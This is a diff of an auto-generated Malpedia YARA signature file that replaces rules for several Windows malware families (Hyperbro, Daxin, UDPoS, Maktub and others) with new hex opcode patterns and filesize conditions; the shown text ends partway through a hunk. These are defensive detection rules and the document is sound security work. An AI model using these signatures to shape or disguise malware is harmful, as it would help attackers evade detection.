-rule MALPEDIA_Win_Quan_Pin_Loader_Auto : FILE
+rule MALPEDIA_Win_Hyperbro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1fa8c8cd-f609-5225-baa7-0fa410d45d6c"
+		id = "0527accf-dc31-5cb1-be86-ae182f5b1e44"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quan_pin_loader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quan_pin_loader_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hyperbro_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "4f7da9c0c4a15d34fa1ce0c27eb780960020faa43be4d9d68fb3c3bdcd21f6fc"
+		logic_hash = "4b67c3c5bbc71bde556bbaa0da5f9d6d067d8c81b3b3ffbe7e62f8abebcb4ca9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94772,32 +94926,32 @@ rule MALPEDIA_Win_Quan_Pin_Loader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d08 e8???????? 85c0 750f 0fb703 6683f80d 7406 }
-		$sequence_1 = { 83630800 488d0524c10400 488903 eb3a 41b804000000 488d15d6ba0400 e8???????? }
-		$sequence_2 = { 4183f904 7410 4183f906 0f85c8fdffff 0fbaea0a eb0a 0fbaea08 }
-		$sequence_3 = { 84d2 7418 c6415401 d1e8 eb14 488d1524a80300 b806000000 }
-		$sequence_4 = { 4d8bc6 418bd7 488bcf e8???????? 8bf0 85c0 0f8850010000 }
-		$sequence_5 = { 488b5d60 488d4c2430 e8???????? 488d4c2420 e8???????? 4883eb20 }
-		$sequence_6 = { b904010000 660b0d???????? 66890d???????? 480fbae71e 7224 0fb7c5 ba0f000000 }
-		$sequence_7 = { 488b5008 488b4810 482bca 48c1f902 493bcd }
-		$sequence_8 = { 488bcb 0f2845e0 660f7f45e0 e8???????? e9???????? c745e805000000 488d0539ef0400 }
-		$sequence_9 = { 41b907000000 4c8bc3 8bd5 ff5018 8bf8 8b442478 }
+		$sequence_0 = { 51 e8???????? 8b5620 52 e8???????? 8b4614 50 }
+		$sequence_1 = { 83fe40 7e33 8b0f 51 e8???????? }
+		$sequence_2 = { 8a4b05 884f01 8b4308 83c410 50 8bc6 c7460840000000 }
+		$sequence_3 = { c70600000000 c7460400000000 8d5e0c e8???????? 83c404 }
+		$sequence_4 = { 0f8617feffff 8a17 8816 46 }
+		$sequence_5 = { 33ff 3bc7 7412 50 e8???????? 83c404 897e20 }
+		$sequence_6 = { 8b4614 8b1d???????? 83c404 3bc7 7406 50 ffd3 }
+		$sequence_7 = { 41 e9???????? 8b442410 8b6c2418 e9???????? 2b4c2428 8b44242c }
+		$sequence_8 = { 83c410 85ed 750e 8b7c2410 }
+		$sequence_9 = { 895c2430 895c2434 3bfb 7409 57 e8???????? 83c404 }
 
 	condition:
-		7 of them and filesize < 1711104
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Webc2_Table_Auto : FILE
+rule MALPEDIA_Win_Daxin_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "74911130-496c-59cd-b9b7-d073dda2a5a6"
+		id = "87cbb543-e190-5544-9083-2d59abd8b683"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_table"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_table_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.daxin_auto.yar#L1-L148"
 		license_url = "N/A"
-		logic_hash = "82557b5976335e4f1972b3218d4e36ee8e0264f2a148ef98566fdf5b62d6108c"
+		logic_hash = "e656f3948a2ac7b99eaa279f9e6a2040cdd5d22a79f30ee80aef3c1f7f763afa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94811,34 +94965,39 @@ rule MALPEDIA_Win_Webc2_Table_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? b800100000 6a04 50 }
-		$sequence_1 = { 41 4e 75b7 8b45f8 be???????? 57 56 }
-		$sequence_2 = { e8???????? 85c0 59 7e1b 8b4c2404 }
-		$sequence_3 = { 0f8fdb000000 6860ea0000 ffd7 ff45f4 }
-		$sequence_4 = { c78548fdffff94000000 8d85e8feffff 50 8d85dcfbffff 50 e8???????? 59 }
-		$sequence_5 = { e8???????? 8b35???????? 8d8558ffffff 50 ff7508 ffd6 8bf8 }
-		$sequence_6 = { 50 8d85e4feffff 50 e8???????? 83c428 }
-		$sequence_7 = { 8bca 8dbd59ffffff f3ab 66ab aa 8bca 33c0 }
-		$sequence_8 = { ff15???????? ff7710 ff15???????? 83c410 50 ff15???????? }
-		$sequence_9 = { e8???????? 83c434 8d8548fdffff c78548fdffff9c000000 50 }
+		$sequence_0 = { 2bc2 d1f8 99 f7f9 }
+		$sequence_1 = { 418b5b3c 418b6b38 e8???????? 85db }
+		$sequence_2 = { 0fb7c0 0bc8 2b8bd0000000 85c9 0f8eec000000 }
+		$sequence_3 = { 488bf0 4885c0 0f8467ffffff 33d2 41b8e0000000 }
+		$sequence_4 = { 66f7d8 1bc0 f7d8 83c003 eb15 }
+		$sequence_5 = { 4533c0 498bcb e8???????? 668bd8 6641895b0a }
+		$sequence_6 = { 740a 8b02 23c1 23cf }
+		$sequence_7 = { 0f8cd8000000 ff15???????? 4c8b4f28 4533c0 884708 }
+		$sequence_8 = { b930000000 33c0 8bfd 66c74664ffff }
+		$sequence_9 = { 57 8908 894804 894808 8b15???????? }
+		$sequence_10 = { b930000000 33c0 8bfb 33f6 }
+		$sequence_11 = { 0f85d8000000 668b4702 663b442412 0f85c9000000 668b4f04 }
+		$sequence_12 = { 8b442412 668b4c2414 66894c2412 6689442414 }
+		$sequence_13 = { 03c7 894e04 8b4e1c 3bc1 c7462400000000 }
+		$sequence_14 = { 0bc1 8d0440 c1e003 8b88c4380f00 85c9 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 3475456
 }
-rule MALPEDIA_Win_Mutabaha_Auto : FILE
+rule MALPEDIA_Win_Broomstick_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f534e66a-bdb8-5a1d-bf5c-73ff5eac186f"
+		id = "1ab4b8f8-6d0d-5d71-8cc9-a6fff05006b5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mutabaha_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broomstick"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.broomstick_auto.yar#L1-L284"
 		license_url = "N/A"
-		logic_hash = "4a43ad552d1d544452880d565c27a595efcac7dc1e5e985992d3dce7571f7838"
+		logic_hash = "0c1a3ef9abdd4d0302256ec532496054e8db7eaa8ec35bdd017317b264a8cb67"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94850,32 +95009,53 @@ rule MALPEDIA_Win_Mutabaha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4610 c6040808 ff4610 8b4610 c6040100 e9???????? 8b4610 }
-		$sequence_1 = { eb18 2bf9 8d145501000000 2bc1 8bcb c1e905 2bd9 }
-		$sequence_2 = { 53 e8???????? 83c41c 85c0 0f8543050000 8b4320 8d55f0 }
-		$sequence_3 = { 68???????? ff15???????? 898530fdffff 85c0 0f8441010000 68???????? 8d8d6cfdffff }
-		$sequence_4 = { 56 8bf1 8d4de8 57 8bfa e8???????? 83781408 }
-		$sequence_5 = { 0fafce 3bc1 731b 8bf9 b900080000 2bce c1e905 }
-		$sequence_6 = { e8???????? c7465400000000 8bc6 8b4df4 64890d00000000 59 5e }
-		$sequence_7 = { c7856cfdffff07000000 66898558fdffff 8b8554fdffff c78568fdffff00000000 83f808 7213 40 }
-		$sequence_8 = { 8bf9 c745f82e000000 e8???????? 40 8bcf 50 8d45f8 }
-		$sequence_9 = { 8b8d40efffff 85c9 7414 8b11 8d851cefffff 3bc8 0f95c0 }
+		$sequence_0 = { 2bc2 83c002 99 83e203 03c2 }
+		$sequence_1 = { 03f0 56 e8???????? 8b45dc 83c40c c6040600 eb10 }
+		$sequence_2 = { 83c40c c6040600 eb10 c645dc00 ff75dc 51 8d4dc0 }
+		$sequence_3 = { c6400100 8808 eb13 ff75e8 }
+		$sequence_4 = { 51 50 51 8bce e8???????? 8b4dec }
+		$sequence_5 = { 83c408 33c0 c7467000000000 c7467407000000 66894660 }
+		$sequence_6 = { 8b45d4 8b75d0 2bc6 894ddc 51 52 }
+		$sequence_7 = { 80b9????????3f 76f3 2bc2 83c002 }
+		$sequence_8 = { 49898688150400 488d4c2428 ffd5 48b80b8b55f8b9616cd5 }
+		$sequence_9 = { ba01000000 488bcf ff15???????? ba32ac0600 488bcf ff15???????? }
+		$sequence_10 = { 488d4d38 e8???????? 0f57c0 0f114518 }
+		$sequence_11 = { 498986876a0300 4889f1 ba07000000 488b2d???????? }
+		$sequence_12 = { 49898687650300 488d4c2428 41ffd4 4889f1 }
+		$sequence_13 = { 4c2bc1 ba2c000000 e8???????? 488bc8 4885c0 }
+		$sequence_14 = { ba01000000 488bcf ff15???????? ba08000000 488bcf ff15???????? 48b8e01fcd305c98c076 }
+		$sequence_15 = { ba01000000 488bcf ff15???????? ba58000000 488bcf ff15???????? }
+		$sequence_16 = { ba01000000 488bcf ff15???????? ba3a867600 488bcf ff15???????? }
+		$sequence_17 = { ba01000000 488bcf ff15???????? ba0a000000 488bcf ff15???????? }
+		$sequence_18 = { ba01000000 488bcf ff15???????? ba5a000000 488bcf ff15???????? }
+		$sequence_19 = { 498986876b0300 488d4c2428 41ffd7 4d89fc }
+		$sequence_20 = { 49898688160400 b917d46400 41ffd4 4889c7 }
+		$sequence_21 = { 49898688320300 b9bc474300 41ffd4 4889c7 }
+		$sequence_22 = { 0f114540 4c896d50 4c896d58 4533c0 }
+		$sequence_23 = { 4c8d053e920100 488bc2 83e23f 48c1f806 488d0cd2 }
+		$sequence_24 = { ba01000000 488bcf ff15???????? ba31e7ca00 488bcf ff15???????? }
+		$sequence_25 = { 488d056cc10200 488907 488d057ac10200 0f104318 488b5c2430 }
+		$sequence_26 = { ba01000000 488bcf ff15???????? ba6ef90b00 488bcf ff15???????? }
+		$sequence_27 = { 49898688140400 4889f1 4889fa 4c8b3d???????? }
+		$sequence_28 = { 48c7457807000000 0f1006 0f114560 e9???????? }
+		$sequence_29 = { 498986876c0300 4889f9 4c8b3d???????? 41ffd7 }
+		$sequence_30 = { 498bc6 4d8bee 49c1fd06 4c896dc7 488d0d8f3afeff }
 
 	condition:
-		7 of them and filesize < 1220608
+		7 of them and filesize < 1567744
 }
-rule MALPEDIA_Win_Firechili_Auto : FILE
+rule MALPEDIA_Win_Udpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4b311c4-f6ac-5e5a-9826-d5ef4ea0d836"
+		id = "c21182e3-9948-53fb-ba16-989de2eeeef7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.firechili"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.firechili_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.udpos_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "db458f5c2a3a8ef8f27139a55fa4a245c49e387f1da157602228dcf03106d70c"
+		logic_hash = "fe240fae257bb918a1862a5669b32e668e7cda4beef5a9f9bbf562c291941f24"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94889,34 +95069,34 @@ rule MALPEDIA_Win_Firechili_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb2d 488b4c2430 8b442440 894110 4533c9 }
-		$sequence_1 = { 4883ec20 488bda 488bf9 ba30000000 33c9 41b873747600 ff15???????? }
-		$sequence_2 = { 4c8d442430 488bcb 41ffd1 eb1b 4c8b05???????? eb23 }
-		$sequence_3 = { 4889bc2488000000 33ff c7450730000000 ba3f000f00 897d67 488d4d77 48897d77 }
-		$sequence_4 = { 4885d2 7509 4883e802 bb05000080 668938 }
-		$sequence_5 = { 0f8489000000 4885db 0f8480000000 488d5318 4032ff 4885d2 7462 }
-		$sequence_6 = { e8???????? 488d0d65370000 ff15???????? ff15???????? 33c0 4881c430020000 }
-		$sequence_7 = { 84c0 0f84ff000000 0fb77c2420 488b742428 8bc7 48d1e8 }
-		$sequence_8 = { 33ff b90d0000c0 4d85d2 0f45cf 7408 488bc2 492bc2 }
-		$sequence_9 = { 4889442420 488d55f7 ff15???????? 85c0 8bd8 0f49df }
+		$sequence_0 = { 83c414 8d55c4 52 ffd7 }
+		$sequence_1 = { 53 56 52 ffd7 }
+		$sequence_2 = { 83c408 3bf3 7ea8 8b5d08 2bde }
+		$sequence_3 = { 8985f4feffff 8985f8feffff 3905???????? 7e09 a1???????? 8b30 eb06 }
+		$sequence_4 = { 7510 c78598feffff01000000 8b9d98feffff 47 83fb01 75b4 85db }
+		$sequence_5 = { 8b8110020000 301408 8b9110020000 0fb6140a }
+		$sequence_6 = { 83c40c 57 6a02 ff15???????? 8d8dd0fdffff 8bf0 }
+		$sequence_7 = { 51 a3???????? e8???????? 83c40c 68ff000000 8d95fcfdffff 52 }
+		$sequence_8 = { 53 e8???????? 83c404 8b95e4fbffff 52 ff15???????? 5b }
+		$sequence_9 = { 83e60f 0fb65c35e8 0fb671fd 8858fd }
 
 	condition:
-		7 of them and filesize < 91136
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Remcom_Auto : FILE
+rule MALPEDIA_Win_Maktub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01102b96-17a1-5040-b86b-1c004c22e442"
+		id = "ecc73f32-ecbd-5318-a556-c2b45ed34c44"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remcom_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maktub_auto.yar#L1-L197"
 		license_url = "N/A"
-		logic_hash = "6c8707261db4e6b23e09ce2152b2182b004699b6aaba00688b2722f030d121d2"
+		logic_hash = "ff16c7a452af8c5ebf57513ce479bd7fbd7433b4ce2d8fbd914a83844ba9c640"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -94928,32 +95108,43 @@ rule MALPEDIA_Win_Remcom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a02 68???????? ffd7 8d4df4 51 6aff 6a00 }
-		$sequence_1 = { 033485e0fc4000 c745e401000000 33db 395e08 7536 6a0a e8???????? }
-		$sequence_2 = { e8???????? 8be5 5d c3 53 56 8d95f8feffff }
-		$sequence_3 = { 56 8b7508 57 8b7d0c 6a44 }
-		$sequence_4 = { ff15???????? 6a00 6a00 6a01 8d4de0 }
-		$sequence_5 = { 33c0 57 8945f8 8945fc 6a01 8d45e0 }
-		$sequence_6 = { 8b7508 57 8b7d0c 6a44 8d85a0feffff }
-		$sequence_7 = { 8bf8 3bfb 746a 56 68ff010f00 68???????? }
-		$sequence_8 = { ffd7 8945f0 eb51 33db 391e 763d }
-		$sequence_9 = { 50 6814120000 8d8de8edffff 51 56 }
+		$sequence_0 = { ffd0 f7d8 1bc0 f7d8 8be5 }
+		$sequence_1 = { ff15???????? eb0a 57 6a08 }
+		$sequence_2 = { ff15???????? eb02 33c0 46 }
+		$sequence_3 = { ff15???????? eb02 33db 8b4df4 }
+		$sequence_4 = { ff15???????? e9???????? 8d43f4 3d???????? 0f84c1000000 833d????????00 }
+		$sequence_5 = { e8???????? 8b75fc 8b4df0 83c305 8a4513 }
+		$sequence_6 = { ff15???????? f6c301 0f8414010000 8d46fc }
+		$sequence_7 = { ff30 e8???????? 8bc7 5f 5e 5b }
+		$sequence_8 = { 8bf8 c785d4fdffff2c020000 8d85d4fdffff 50 57 68???????? }
+		$sequence_9 = { 8d4f14 8b18 8b7004 8d45e8 }
+		$sequence_10 = { 8bf8 8d442428 6a50 50 897c2424 }
+		$sequence_11 = { 8d4f2c e8???????? 84c0 7578 }
+		$sequence_12 = { 8bf8 c744242000000000 f7642424 8bcf 0fafcd 8bd8 8b44241c }
+		$sequence_13 = { 8bf8 8b4c242c 03f2 03710c }
+		$sequence_14 = { 8d4f20 e8???????? 84c0 750f }
+		$sequence_15 = { 8d4f10 e8???????? 8d4f30 8b30 8b5004 8d45f0 }
+		$sequence_16 = { 8d4f34 e8???????? 8d4f14 8b18 }
+		$sequence_17 = { 8bf8 8db508040000 b917000000 53 }
+		$sequence_18 = { 8d4f28 89471c 33c0 c6472000 }
+		$sequence_19 = { 8bf8 897dec 33db 66895f0c 895dfc 8b450c }
+		$sequence_20 = { 8d4f30 e8???????? 8b470c 8d4d10 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 3063808
 }
-rule MALPEDIA_Win_Ruckguv_Auto : FILE
+rule MALPEDIA_Win_Skip20_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0458bbf5-faad-51b1-bbf4-5951261d0eab"
+		id = "3a4637b8-f789-501b-b30e-9b5c38cc0f0d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ruckguv_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.skip20"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.skip20_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "45b231c70efe5a17389a0b484f9ffc2309c40182fd8d298e6f80ad3ac2eb154c"
+		logic_hash = "37102bdc96bcca2b357e821094999917631ae97c09451ffb93720795a4f9e949"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -94967,32 +95158,32 @@ rule MALPEDIA_Win_Ruckguv_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750f 56 50 53 }
-		$sequence_1 = { 50 8d4640 50 8d4340 50 }
-		$sequence_2 = { 51 56 8b7508 8b463c 03c6 }
-		$sequence_3 = { ff75fc ffd0 5f 5e 8bc3 5b }
-		$sequence_4 = { a5 a5 66a5 a4 33f6 56 8d453c }
-		$sequence_5 = { ffd0 8d859cfdffff 50 68???????? }
-		$sequence_6 = { 884d13 8a8801010000 33ff 884dff 397d0c 763d 53 }
-		$sequence_7 = { 7908 49 81c900f0ffff 41 0fb7c9 }
-		$sequence_8 = { 57 8d8598fcffff 50 8d85a0feffff 68???????? 50 ff555c }
-		$sequence_9 = { 8d859cfdffff 50 68???????? e8???????? 6814f1f808 }
+		$sequence_0 = { 0fb74114 8b540824 4803d3 8b7c0820 4885d2 0f840b1d0000 }
+		$sequence_1 = { 488d0c40 4c8d0584fe0100 4d8b04c8 488bd7 }
+		$sequence_2 = { 894c2430 89542428 488d15fd2c0100 e9???????? 4c896c2450 66c744245cff25 }
+		$sequence_3 = { 488d0db5220100 e8???????? eb4a 4c896c2450 440fb74c2472 440fb7442470 }
+		$sequence_4 = { 4c8d254c540100 488b0d???????? bf01000000 897c2460 }
+		$sequence_5 = { 8bd6 81e200004000 747e 41ff4c2418 781e }
+		$sequence_6 = { ffc9 7432 ffc9 0f85150a0000 814e0400000002 4180e304 }
+		$sequence_7 = { e8???????? 0fb64732 ffc3 3bd8 72dd 4c21aea0000000 0fb74f18 }
+		$sequence_8 = { 7418 0fbae119 730a f68424b800000008 7508 41be01000000 }
+		$sequence_9 = { 0fb744247c 89442438 0fb74c247a 894c2430 0fb7542478 89542428 488d15652f0100 }
 
 	condition:
-		7 of them and filesize < 41024
+		7 of them and filesize < 794624
 }
-rule MALPEDIA_Win_Fireball_Auto : FILE
+rule MALPEDIA_Win_Clipog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3428bf8-96e6-53b5-b02d-f9e2f263c340"
+		id = "40f61fa4-a638-5725-b8b6-91b34a21950a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fireball_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.clipog_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0f22d443c5f81dd9534cb92d3695167967ab7b76ab570ebe6d321bfdbed116f0"
+		logic_hash = "9ab729847c05f2fd79a1197d1bbe3eecdfb3d818a19100d3fd94f6d00b4e49b5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95006,32 +95197,32 @@ rule MALPEDIA_Win_Fireball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 837c242008 c78424c800000007000000 c78424c400000000000000 66898424b4000000 }
-		$sequence_1 = { 8d842484000000 50 8d9424d0000000 8d8c24a8010000 c68424cc01000009 e8???????? }
-		$sequence_2 = { 83c404 33c0 83bc249800000008 c744246807000000 c744246400000000 }
-		$sequence_3 = { 83bc24b000000008 c784248000000007000000 c744247c00000000 668944246c 7228 }
-		$sequence_4 = { 8b0e e8???????? eb2a ff750c }
-		$sequence_5 = { 5e c3 55 8bec 8b4508 ff34c5a8f52400 }
-		$sequence_6 = { 3a503a 683a783a7c 3a803a843a98 3a9c3aa03ab83a }
-		$sequence_7 = { 0f43842480000000 6a00 50 ffd7 8d442464 50 }
-		$sequence_8 = { e9???????? 8d8d44fbffff e9???????? 8d8d44fbffff e9???????? 8b542408 8d823cfbffff }
-		$sequence_9 = { 80bda7fdffff00 8b5d1c 8b7d18 8b7508 741d 57 8d4508 }
+		$sequence_0 = { 488b4b18 6685c0 740c 488d1552e70100 }
+		$sequence_1 = { 488d1552e70100 e9???????? 488d154ae70100 e9???????? b910000000 }
+		$sequence_2 = { 760c 488d0d5fec0100 e8???????? 48397b18 730d 488bd7 }
+		$sequence_3 = { 753b 488b41f8 483bc1 7338 482bc8 4883f908 7235 }
+		$sequence_4 = { 4883f808 725d 48ffc0 488b4c2448 493bc4 7606 e8???????? }
+		$sequence_5 = { 488bda 4c8d0d1fbc0000 8bf9 488d1586a10000 b906000000 4c8d0502bc0000 e8???????? }
+		$sequence_6 = { 488b05???????? 4833c4 488985a0040000 4c8b95f8040000 488d0524160100 0f1000 }
+		$sequence_7 = { 488d158ee80100 e9???????? b910000000 ff15???????? 488b4b18 }
+		$sequence_8 = { e8???????? 90 4c8d0556ea0100 488bd0 }
+		$sequence_9 = { 488d1599100200 488d0d9a100200 e8???????? 488bd8 488d4c2430 48837c244810 480f434c2430 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 372736
 }
-rule MALPEDIA_Win_Unidentified_103_Auto : FILE
+rule MALPEDIA_Win_Playwork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b558874c-ad8a-53b0-9aa8-68edfb2b5b00"
+		id = "253bcdde-b9c7-5158-90ca-b4dcc36f9889"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_103_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.playwork_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "53bab14606fb94c26c9c4250a4ba5d5b69e3e483ae51cdbc9cd021b3f09f3c4b"
+		logic_hash = "93e0526e64b6e0ff6fb1dc40df8f238384033948c1e004d69238a8eee94e726f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95045,32 +95236,32 @@ rule MALPEDIA_Win_Unidentified_103_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89c3 ffd6 897c2408 c744240400000000 890424 ff942488000000 }
-		$sequence_1 = { 897c2434 8bbc2450010000 894c2430 8b8c244c010000 }
-		$sequence_2 = { 8944246c 8d842419010000 c784241901000061647661 c784241d01000070693332 c78424210100002e646c6c 890424 }
-		$sequence_3 = { 8b3c24 85ff 743a c6012d c6441e0200 89d3 0fb60c06 }
-		$sequence_4 = { 8b8424c4000000 ffd0 83ec04 c684249001000000 8dac240c060000 c78424c403000000000000 }
-		$sequence_5 = { 8b842440010000 89442418 8b842438010000 89442414 8b8424d0000000 8b00 89442404 }
-		$sequence_6 = { 8d54244a 83c001 803c0200 75f7 8b8c2498000000 c744240c34020000 }
-		$sequence_7 = { c78424a60000007072696e c68424ac00000000 e8???????? b865000000 31db c784241c03000028010000 c7842433010000576d6950 }
-		$sequence_8 = { 89442404 c78424d201000052656164 c78424d601000046696c65 c68424da01000000 e8???????? 891c24 8984241c010000 }
-		$sequence_9 = { 897c2420 8bbc2444010000 897c241c 8bbc2440010000 897c2418 8bbc2488010000 }
+		$sequence_0 = { 85c0 59 8945f0 0f84d4010000 8d4df4 }
+		$sequence_1 = { eb02 32db 8ac3 8acb c0e807 d0e1 }
+		$sequence_2 = { 57 8d857ce9ffff 56 50 6800004004 8d4de0 ff7510 }
+		$sequence_3 = { 8bd0 8d85e8afffff 50 8955ec ffd3 8b4dec }
+		$sequence_4 = { 53 50 8d4510 6a08 50 57 ffd6 }
+		$sequence_5 = { c1eb18 330c95344b3f00 8b55e0 8b349d34573f00 c1ea10 }
+		$sequence_6 = { 50 8d85b8ebffff 68???????? 50 e8???????? 83c444 8d85b8ebffff }
+		$sequence_7 = { e8???????? 8b45fc 83c40c 668b4008 50 ff15???????? 0fb7c0 }
+		$sequence_8 = { a4 284405c8 40 83f822 7cf6 }
+		$sequence_9 = { 8bce 8975e8 c1e918 8b3c8d34573f00 8b4de0 333c9534533f00 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Httpsuploader_Auto : FILE
+rule MALPEDIA_Win_Coredn_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96408757-8238-57f6-8412-86b6523d9a84"
+		id = "07ee8205-8782-52d9-9a53-818875f21066"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpsuploader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.httpsuploader_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coredn_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "6d3671102275ad7b87147a31f1d30011248bd9c06ff651580514d36fdd35a180"
+		logic_hash = "67a00f5807f423f86c2e11cef6a3e34c3be3d717b80668bf24ae3e2d19c2ab6b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -95084,32 +95275,37 @@ rule MALPEDIA_Win_Httpsuploader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
